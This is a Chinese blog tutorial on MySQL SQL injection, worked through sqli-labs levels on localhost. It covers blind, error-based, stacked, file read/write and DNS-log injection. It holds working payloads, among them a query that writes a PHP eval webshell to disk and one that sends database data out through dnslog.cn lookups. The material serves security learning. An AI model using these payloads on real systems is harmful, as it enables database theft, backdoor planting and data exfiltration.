<h2 id="1-2if"><a href="#1-2if" class="headerlink" title="1.2if()"></a>1.2if()</h2><p>if是计算机编程语言中常见的分支结构，if(a,b,c)相当于三目运算符，a相当于条件体，如果a成立则输入b，负责输入c<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736738269-714f68d2-c8a2-40c0-8060-0aa2258713fb.png#averageHue=%2311100f&clientId=u9a79f967-2f20-4&from=paste&height=158&id=u6c2153e7&originHeight=197&originWidth=595&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=469900&status=done&style=none&taskId=ua8126fe7-1f87-4c6f-a20d-33cb29f003c&title=&width=476" alt="image.png"><br>也可以结合sleep一起使用<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736758654-d3e576d8-41ab-425b-902b-e3e185fa8f6b.png#averageHue=%23131211&clientId=u9a79f967-2f20-4&from=paste&height=154&id=u047d24c8&originHeight=193&originWidth=597&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=461903&status=done&style=none&taskId=u29d92adb-e9b5-4e95-8efb-2a540350bc8&title=&width=477.6" alt="image.png"><br>响应时间3秒由此可见该数据库的名字为test</p>
<h2 id="1-3length"><a href="#1-3length" class="headerlink" title="1.3length()"></a>1.3length()</h2><p>可以使用length来判断数据的长度<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736817247-863e3f4a-7333-4120-8c22-5aefdac25a54.png#averageHue=%233e3736&clientId=u9a79f967-2f20-4&from=paste&height=129&id=ucd03f0b1&originHeight=161&originWidth=692&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=446611&status=done&style=none&taskId=ud393383e-c655-48fb-808e-1fe4b6e87bd&title=&width=553.6" alt="image.png"><br>可以看到网页加载了4秒左右，由此可见该网站的数据库名长度为8<br>语句:?id&#x3D;1 and sleep(if(length(database())&#x3D;8,4,0))</p>
<h2 id="1-4mid"><a href="#1-4mid" class="headerlink" title="1.4mid()"></a>1.4mid()</h2><p>此函数为截取字符串的一部分<br>mid(a,b,c)<br>a 必需，表示为要提取字符的字段<br>b 必需，表示为规定开始的位置(起始为1)<br>c 可选，表示为规定结束的位置（如果省略，mid函数会返回剩余的所有字符）<br>例如:mid(hello,1,3) -&gt; hel<br>Mid(hello,1) -&gt; hello<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736900516-d98f6252-8a58-40d2-879a-9907b0555743.png#averageHue=%23131211&clientId=u9a79f967-2f20-4&from=paste&height=162&id=ub8cd0c76&originHeight=203&originWidth=460&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=374407&status=done&style=none&taskId=ucc43245c-b61b-44b9-bb40-d943a9f5ec0&title=&width=368" alt="image.png"></p>
<h2 id="1-5-substr-和substring"><a href="#1-5-substr-和substring" class="headerlink" title="1.5 substr()和substring()"></a>1.5 substr()和substring()</h2><p>Substr()和substring()函数实现的功能是一样的，均为截取字符串。string substring(string, start, length) string substr(string, start, length) 参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736980406-12d4268f-6ab3-4eef-b8e4-6dd29cc05e30.png#averageHue=%23131211&clientId=u9a79f967-2f20-4&from=paste&height=475&id=u44361a8b&originHeight=594&originWidth=495&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=1178689&status=done&style=none&taskId=ua01679d6-6df8-4854-a245-eb9a79f0881&title=&width=396" alt="image.png"></p>
<h2 id="1-6left"><a href="#1-6left" class="headerlink" title="1.6left()"></a>1.6left()</h2><p>Left()得到字符串左部指定个数的字符<br>Left ( string, n ) string为要截取的字符串，n为长度。<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721737088314-38200ef3-f267-4633-98e6-81ae119f5a46.png#averageHue=%23121110&clientId=u9a79f967-2f20-4&from=paste&height=152&id=u8a091cd3&originHeight=190&originWidth=453&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=345113&status=done&style=none&taskId=u1aee9386-1aae-43af-90ef-4d297d300e4&title=&width=362.4" alt="image.png"></p>
<h2 id="1-7ascii"><a href="#1-7ascii" class="headerlink" title="1.7ascii()"></a>1.7ascii()</h2><p>推荐使用ASCII码<br>1.防止引号 ‘ “ 转义<br>2.方便以后工具的使用<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721737155322-a9d8dbe3-387a-43be-8561-58252177bbd1.png#averageHue=%23121110&clientId=u9a79f967-2f20-4&from=paste&height=152&id=u62d940b2&originHeight=190&originWidth=559&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=425791&status=done&style=none&taskId=ubdbdcabb-0e81-4b17-a360-7d277269c00&title=&width=447.2" alt="image.png"></p>
<h1 id="2-布尔盲注"><a href="#2-布尔盲注" class="headerlink" title="2.布尔盲注"></a>2.布尔盲注</h1><h2 id="2-1什么是布尔盲注"><a href="#2-1什么是布尔盲注" class="headerlink" title="2.1什么是布尔盲注"></a>2.1什么是布尔盲注</h2><p>Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721734974168-00d0cb76-5cc0-43bc-aa02-78ead47d97d7.png#averageHue=%23fcfaf9&clientId=uaa0a7f9c-b939-4&from=paste&height=363&id=ufe849ed3&originHeight=454&originWidth=692&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=1259236&status=done&style=none&taskId=ua5ae7318-68bb-4773-a2cc-dc24366596d&title=&width=553.6" alt="image.png"><br>为true时<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721734980784-e48f1d8f-6a32-4106-927a-13b259964d91.png#averageHue=%23a6a066&clientId=uaa0a7f9c-b939-4&from=paste&height=684&id=u2d802800&originHeight=855&originWidth=1523&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=321429&status=done&style=none&taskId=u267a0e70-13fd-426c-808b-94811cbb2f6&title=&width=1218.4" alt="image.png"><br>为false时<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721735008076-13ea6507-55d0-4931-9742-22350b7168b0.png#averageHue=%23a49d6c&clientId=uaa0a7f9c-b939-4&from=paste&height=689&id=u12b74af4&originHeight=861&originWidth=1508&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=315838&status=done&style=none&taskId=u4845bb9d-548a-49c0-8aae-696af054198&title=&width=1206.4" alt="image.png"></p>
<h2 id="2-2如何进行布尔盲注"><a href="#2-2如何进行布尔盲注" class="headerlink" title="2.2如何进行布尔盲注"></a>2.2如何进行布尔盲注</h2><p><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721735037346-375e3cc9-4f6a-4010-8bfa-ba06f3b15e5b.png#averageHue=%23fdfdfc&clientId=uaa0a7f9c-b939-4&from=paste&height=240&id=u775b80ed&originHeight=300&originWidth=692&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=832126&status=done&style=none&taskId=uba9d68ce-6d64-4d86-93e7-78decdf792f&title=&width=553.6" alt="image.png"></p>
<h2 id="2-3sqli-labs第5关实战"><a href="#2-3sqli-labs第5关实战" class="headerlink" title="2.3sqli-labs第5关实战"></a>2.3sqli-labs第5关实战</h2><ol>
<li>存在注入点且闭合符是单引号<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721735489300-f2c38832-aa70-4f5b-948c-c4baa0fceb44.png#averageHue=%23a69d6e&clientId=u9a79f967-2f20-4&from=paste&height=725&id=JvPFo&originHeight=906&originWidth=1600&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=340140&status=done&style=none&taskId=ua18cb0cf-1b36-4d93-8a6c-869c39260f9&title=&width=1280" alt="image.png"></li>
<li>?id&#x3D;1’ and length(database())&#x3D;8–+判断数据库名的长度<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721735607717-018e0d2e-98e1-472f-b4da-1942b03c8c1e.png#averageHue=%23ada763&clientId=u9a79f967-2f20-4&from=paste&height=654&id=u09c137d0&originHeight=818&originWidth=1433&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=309091&status=done&style=none&taskId=ub101efb2-056a-4a78-8424-18f196a77e8&title=&width=1146.4" alt="image.png"></li>
<li>?id&#x3D;1’ and ascii(mid(database(),1,1))&#x3D;115–+ <img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721735947984-75f534f5-d047-4137-b5e1-86db667a6eb1.png#averageHue=%23afa862&clientId=u9a79f967-2f20-4&from=paste&height=680&id=u11be621b&originHeight=850&originWidth=1441&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=308614&status=done&style=none&taskId=u41dfd3a3-286c-46e6-8417-a624c0340c5&title=&width=1152.8" alt="image.png"></li>
<li>直接使用爆破工具爆破数据库名所有字符<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736501346-4ab3d1c8-98d3-4204-9b6b-1330313bc959.png#averageHue=%2392d6b1&clientId=u9a79f967-2f20-4&from=paste&height=586&id=z6bT4&originHeight=733&originWidth=1472&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=147536&status=done&style=none&taskId=u445b91dd-652c-47d7-934f-c06fc4e58ff&title=&width=1177.6" alt="image.png"></li>
</ol>
<h1 id="3-报错盲注"><a href="#3-报错盲注" class="headerlink" title="3.报错盲注"></a>3.报错盲注</h1><h2 id="3-1什么是报错盲注"><a href="#3-1什么是报错盲注" class="headerlink" title="3.1什么是报错盲注"></a>3.1什么是报错盲注</h2><p>报错盲注就是利用了数据库的某些机制，人为的制造错误条件，使得查询结果出现在报错提示中。</p>
<h2 id="3-2报错盲注的前提"><a href="#3-2报错盲注的前提" class="headerlink" title="3.2报错盲注的前提"></a>3.2报错盲注的前提</h2><p>页面上没有回显点，但是必须有SQL语句执行错误的信息。</p>
<h2 id="3-3-常见的报错注入函数"><a href="#3-3-常见的报错注入函数" class="headerlink" title="3.3. 常见的报错注入函数"></a>3.3. <strong>常见的报错注入函数</strong></h2><pre><code class="sql">1.floor() 　　如：select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()　　如：select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()　　如：select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()　　如：select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()　　如：select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()　　如：select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()　　如：select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()　　如：select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()　　如：select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()　　如：select * from test where id=1 and exp(~(select * from(select user())a));
</code></pre>
<p>updatexml():从目标XML中更改包含所查询值的字符串<br>updatexml(xml_doument,XPath_string,new_value)<br>第一个参数：XML的内容<br>第二个参数：是需要update的位置XPATH路径<br>第三个参数：是更新后的内容<br>extractvalue():从目标XML中返回包含所查询值的字符串<br>第一个参数：XML_document 是String格式，为XML文档对象的名称，文中为DOC<br>第二个参数：XPath_String (Xpath格式字符串)<br>这两个函数的第二个参数都是XPath,无论你使用那个函数，只要XPath的格式错了都会报错</p>
<h2 id="3-4实战-sqli-labs第1关"><a href="#3-4实战-sqli-labs第1关" class="headerlink" title="3.4实战 sqli-labs第1关"></a>3.4实战 sqli-labs第1关</h2><ol>
<li>使用extractvalue()爆破:?id&#x3D;1’ and (extractvalue(1,concat(0x7e,(select substr((select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),1,32)),0x7e)))–+<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721738976951-fcb39b42-0cf8-49c3-8e73-d2c4208adbad.png#averageHue=%234e4e4c&clientId=u9a79f967-2f20-4&from=paste&height=730&id=u95471236&originHeight=913&originWidth=1900&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=241169&status=done&style=none&taskId=uc9a57d24-892c-4cbc-a502-74b2aa12d67&title=&width=1520" alt="image.png"></li>
<li>使用updatexml()爆破:?id&#x3D;1’ and (updatexml(1,concat(0x7e,(select substr((select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),1,32)),0x7e),1))–+<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721739213838-fbf4d51a-79be-4d75-bbc3-d6dd2f7c764f.png#averageHue=%234f4f4c&clientId=u9a79f967-2f20-4&from=paste&height=725&id=u0f974817&originHeight=906&originWidth=1554&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=222448&status=done&style=none&taskId=ud9100835-5157-40b2-af88-06525ce444a&title=&width=1243.2" alt="image.png"></li>
</ol>
<h1 id="4-时间盲注"><a href="#4-时间盲注" class="headerlink" title="4.时间盲注"></a>4.时间盲注</h1><h2 id="4-1什么是时间盲注"><a href="#4-1什么是时间盲注" class="headerlink" title="4.1什么是时间盲注"></a>4.1什么是时间盲注</h2><p>延时注入是指通过制造延时注入语句后，浏览器的响应时间来判断正确的数据</p>
<h2 id="4-2应用场景"><a href="#4-2应用场景" class="headerlink" title="4.2应用场景"></a>4.2应用场景</h2><p>延时注入的应用场景是，在我们输入and 1或者and 0的时候，页面的返回无变化，这个时候可以通过and sleep(5)来判断一下页面的响应时间，相应时间在五秒多一点的话，说明此处可以使用延时注入</p>
<h2 id="4-3弊端"><a href="#4-3弊端" class="headerlink" title="4.3弊端"></a>4.3弊端</h2><p>使用较少，我们在判断数据的正确性时是通过对所有字母，数字，特殊字符进行猜测，效率太低了，而且浏览器的延迟有很多外在因素，例如:网速太慢，电脑硬件问题..</p>
<h2 id="4-4实战：sqli-labs第9关"><a href="#4-4实战：sqli-labs第9关" class="headerlink" title="4.4实战：sqli-labs第9关"></a>4.4实战：sqli-labs第9关</h2><ol>
<li>无论输入什么都显示正确，不显示报错信息<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721739612139-0a56a9b4-d8e9-4545-be56-99e24825b67a.png#averageHue=%2346423f&clientId=u9a79f967-2f20-4&from=paste&height=701&id=u7d9e3d13&originHeight=876&originWidth=1834&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=348238&status=done&style=none&taskId=uaf48ea5f-dfd8-425e-af3a-b69efe837aa&title=&width=1467.2" alt="image.png"></li>
<li>使用if()和sleep()测试，?id&#x3D;1’ and if(1&#x3D;2,1,sleep(5))–+发生了延迟，因此可见，该关为时间盲注<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721739732582-40d44d06-b17c-47e7-9b21-08e62cf00b9d.png#averageHue=%23a46636&clientId=u9a79f967-2f20-4&from=paste&height=738&id=u0b6b0fc2&originHeight=923&originWidth=1729&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=360442&status=done&style=none&taskId=u4aa2092c-54e3-462e-a956-74bc037420d&title=&width=1383.2" alt="image.png"></li>
<li>判断数据库名长度?id&#x3D;1’ and if(length(database())&#x3D;8,1,sleep(5))–+<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721739906240-0e506fc0-8433-46cf-8811-ad82706f5a87.png#averageHue=%2345403d&clientId=u9a79f967-2f20-4&from=paste&height=686&id=u66c1423d&originHeight=858&originWidth=1632&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=341939&status=done&style=none&taskId=u77c20e22-7829-4e9a-8aa5-e7bf9401834&title=&width=1305.6" alt="image.png"></li>
<li>使用爆破工具爆破数据库名，延迟在5000ms以上的都是数据库名中的字符<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721740391190-33b5be8b-a372-462d-9401-55be576cc302.png#averageHue=%23a0dbb8&clientId=u9a79f967-2f20-4&from=paste&height=581&id=u0fb38769&originHeight=726&originWidth=1497&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=135612&status=done&style=none&taskId=u252c91a9-8007-4841-9a49-e69e928c392&title=&width=1197.6" alt="image.png"></li>
</ol>
<h1 id="5-堆叠注入"><a href="#5-堆叠注入" class="headerlink" title="5.堆叠注入"></a>5.堆叠注入</h1><h2 id="5-1什么是-堆叠注入"><a href="#5-1什么是-堆叠注入" class="headerlink" title="5.1什么是 堆叠注入"></a>5.1什么是 堆叠注入</h2><p>在SQL中，分号 ；是用来表示一条sql语句的结束，试想一下我们在 ； 结束一个sql语句后面继续构造下一个语句 会不会一起执行？因此这个想法也就造就了堆叠注入。<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721740785795-1e5daeea-e6aa-4e8d-84bd-8cafce9a3d98.png#averageHue=%23171717&clientId=u9a79f967-2f20-4&from=paste&height=558&id=ub6447bda&originHeight=697&originWidth=510&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=1424952&status=done&style=none&taskId=u8aaf2405-acb2-4f41-bd53-9c008143b0a&title=&width=408" alt="image.png"></p>
<h2 id="5-2实战：sqli-labs第38关"><a href="#5-2实战：sqli-labs第38关" class="headerlink" title="5.2实战：sqli-labs第38关"></a>5.2实战：sqli-labs第38关</h2><p>语句：  ?[id&#x3D;1%27;insert%20into%20users(id,username,password)%20values%20(%2722%27,%27mc%27,%27hello%27)–+](<a href="http://localhost/sqli-labs-master/Less-38/?id=1%27;insert">http://localhost/sqli-labs-master/Less-38/?id=1&#39;;insert</a> into users(id,username,password) values (‘22’,’mc’,’hello’)–+)<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721740934710-cce51f99-61c3-4b33-b7fc-2975e70faab5.png#averageHue=%23494a44&clientId=u9a79f967-2f20-4&from=paste&height=714&id=ud8f063a4&originHeight=893&originWidth=1792&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=373522&status=done&style=none&taskId=u15d71bda-e1c8-41d4-b54c-5b457ca3a8b&title=&width=1433.6" alt="image.png"><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721740949978-ab67ee05-57da-44b1-888f-1585e9936dec.png#averageHue=%23181717&clientId=u9a79f967-2f20-4&from=paste&height=270&id=u4a92500f&originHeight=338&originWidth=321&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=435120&status=done&style=none&taskId=uf8ef61f9-7ef4-410e-896e-42c006a517a&title=&width=256.8" alt="image.png"></p>
<h1 id="6-文件读写"><a href="#6-文件读写" class="headerlink" title="6.文件读写"></a>6.文件读写</h1><h2 id="6-1前提"><a href="#6-1前提" class="headerlink" title="6.1前提"></a>6.1前提</h2><p>必须要有root权限<br>我们要在my.ini文件里进行配置<br>secure_file_priv&#x3D;<br>代表对文件读写没有限制<br>secure_file_priv&#x3D;NULL<br>代表不能进行文件读写<br>secure_file_priv&#x3D;d:&#x2F;phpstudy&#x2F;mysql&#x2F;data<br>代表只能对该路径下文件进行读写</p>
<h2 id="6-2文件读写注入的原理"><a href="#6-2文件读写注入的原理" class="headerlink" title="6.2文件读写注入的原理"></a>6.2文件读写注入的原理</h2><p>就是利用文件的读写权限进行注入，它可以写入一句话木马，也可以读取系统文件的敏感信息。</p>
<h2 id="6-3读取文件"><a href="#6-3读取文件" class="headerlink" title="6.3读取文件"></a>6.3读取文件</h2><p>使用函数：load_file()<br>后面的路径可以是单引号，0x，char转换的字符。<br>注意：路径中斜杠是&#x2F;不是\。<br>一般可以与union中做为一个字段使用，查看config.php(即mysql的密码)，apache配置…<br>?id&#x3D;-1’ union select 1,load_file(‘d:&#x2F;1.txt’),3–+<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721741381410-0585f783-ac61-460b-ae66-2b2b9dc04287.png#averageHue=%23565655&clientId=u9a79f967-2f20-4&from=paste&height=751&id=u3622d642&originHeight=939&originWidth=1630&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=214446&status=done&style=none&taskId=ubc48319c-6c51-4486-bed4-73fa6709a5f&title=&width=1304" alt="image.png"><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721741390260-011fec77-78a1-4bf1-8bb4-facdaca5911a.png#averageHue=%23f9f8f7&clientId=u9a79f967-2f20-4&from=paste&height=148&id=u2d21b3c7&originHeight=185&originWidth=306&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=5838&status=done&style=none&taskId=uf6e693d5-2507-41df-8c38-9c47716dfb8&title=&width=244.8" alt="image.png"></p>
<h2 id="6-4写入文件"><a href="#6-4写入文件" class="headerlink" title="6.4写入文件"></a>6.4写入文件</h2><p>使用函数：Into Outfile（能写入多行，按格式输出）和 into Dumpfile（只能写入一行且没有输出格式）<br>outfile 后面不能接0x开头或者char转换以后的路径，只能是单引号路径<br>这里我们创建一个名为lj的txt文件并在里面写入内容为lijun<br>?id&#x3D;1 union select 1,’lijun’,3 into outfile ‘e:&#x2F;lj.txt’<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721741635193-5d8d048c-68de-4d1b-aa15-c539373bfc1c.png#averageHue=%23cfcfcf&clientId=u9a79f967-2f20-4&from=paste&height=699&id=ufcb43af6&originHeight=874&originWidth=1648&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=90489&status=done&style=none&taskId=ufecf2686-1343-4aca-8327-9ecad44ae27&title=&width=1318.4" alt="image.png"></p>
<h2 id="6-5实战：sqli-labs第7关"><a href="#6-5实战：sqli-labs第7关" class="headerlink" title="6.5实战：sqli-labs第7关"></a>6.5实战：sqli-labs第7关</h2><ol>
<li>?id&#x3D;1看到了outfile<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721741745047-a1203eeb-0b10-4be6-8c97-9300b81ecb8e.png#averageHue=%23a29b58&clientId=u9a79f967-2f20-4&from=paste&height=693&id=ue984d13f&originHeight=866&originWidth=1622&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=320557&status=done&style=none&taskId=ub81b4a44-18ff-4478-bb50-d37e292a142&title=&width=1297.6" alt="image.png"></li>
<li>?id&#x3D;1’)) union select 1,’666’,3 into outfile ‘d:&#x2F;wd.txt’–+<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721741926500-0dc3b91a-e1a8-4caf-849d-b7d20124ebca.png#averageHue=%23c3c3c2&clientId=u9a79f967-2f20-4&from=paste&height=790&id=uc007c745&originHeight=987&originWidth=1504&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=163903&status=done&style=none&taskId=u6206de7a-c215-4346-9288-fe9c12509c0&title=&width=1203.2" alt="image.png"></li>
<li>上传木马：?id&#x3D;1’)) and 1&#x3D;2 union select 1,2,”<?php @eval($_POST['cmd']) ?>“%20 into outfile “D:\shell.php”–+<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721742239452-976510c8-9c56-4cf2-9e4b-92568ec73a72.png#averageHue=%23c9c8c8&clientId=u9a79f967-2f20-4&from=paste&height=751&id=u77521406&originHeight=939&originWidth=1714&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=164804&status=done&style=none&taskId=u4af4ee10-cad2-43d9-8643-37e8f26b5ea&title=&width=1371.2" alt="image.png"></li>
</ol>
<h1 id="7-dnslog-cn使用"><a href="#7-dnslog-cn使用" class="headerlink" title="7.dnslog.cn使用"></a>7.dnslog.cn使用</h1><p>打开yakit-&gt;点击反连-&gt;点击dns-&gt;点击生成一个可用域名<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721742401835-19091aea-c500-4b59-bf47-7d747e6fe468.png#averageHue=%23fcfbfa&clientId=u9a79f967-2f20-4&from=paste&height=514&id=u8f8b105b&originHeight=643&originWidth=1631&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=58320&status=done&style=none&taskId=u3dc38054-dd2a-4374-9ada-982a057e349&title=&width=1304.8" alt="image.png"><br>“\\“ 四个\不能少<br>注意.uifm3e.dnslog.cn是你的子域名，前面要加个.。<br>后面的\xxx.txt，\是必须的，xxx.txt这部分随便是什么内容，不能为空。<br>查看版本信息：（注意包裹符<br><a href="http://127.0.0.1/sqli-labs-master/Less-1/">?</a>id&#x3D;1’ and load_file(concat(“\\“,version(),”.vo9tus.dnslog.cn\robots.txt”)) – -<br>?id&#x3D;1” and load_file(concat(“\\“,version(),”.ow2ur7.dnslog.cn\robots.txt”))– -<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721742719334-ee97e2b8-5618-4b2a-8b39-40547a7b4250.png#averageHue=%23535251&clientId=u9a79f967-2f20-4&from=paste&height=730&id=u2efdf361&originHeight=913&originWidth=1496&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=201375&status=done&style=none&taskId=uba4c6dfa-5bc3-4d6a-8f75-e8279ed4122&title=&width=1196.8" alt="image.png"><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721742729127-da2f03d2-8666-4e21-9b87-132f9f446a5a.png#averageHue=%23fcfbfa&clientId=u9a79f967-2f20-4&from=paste&height=771&id=uab122208&originHeight=964&originWidth=1730&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=110422&status=done&style=none&taskId=u62614d6f-e352-431b-aa83-33ed504af8f&title=&width=1384" alt="image.png"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 18px 3px 15px 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
